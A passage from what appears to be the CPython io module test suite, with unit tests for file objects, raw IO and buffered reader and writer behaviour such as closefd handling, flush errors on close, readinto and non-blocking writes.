with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite the failed flush,
# and that flush() is called before the file is closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(os.fsencode(support.TESTFN)))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
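# Check that the C (io) and pure-Python (_pyio) RawIOBase classes expose the same
# set of methods.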
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that the buffered file is closed despite the failed flush,
# and that flush() is called before the file is closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
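# CPython-only checks that sys.getsizeof() of a buffered object tracks its buffer
# size and that the buffer is released when the object is closed.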
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
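# Behavioural tests for BufferedReader, driven mostly through the raw IO mocks
# defined above.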
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
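# Each entry: [buffer_size, sizes of the buffered reads to perform,
# expected lengths recorded by the raw stream's read_history].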
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
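# Behavioural tests for BufferedWriter: buffering thresholds, flushing, non-blocking
# raw streams and threaded writes.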
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
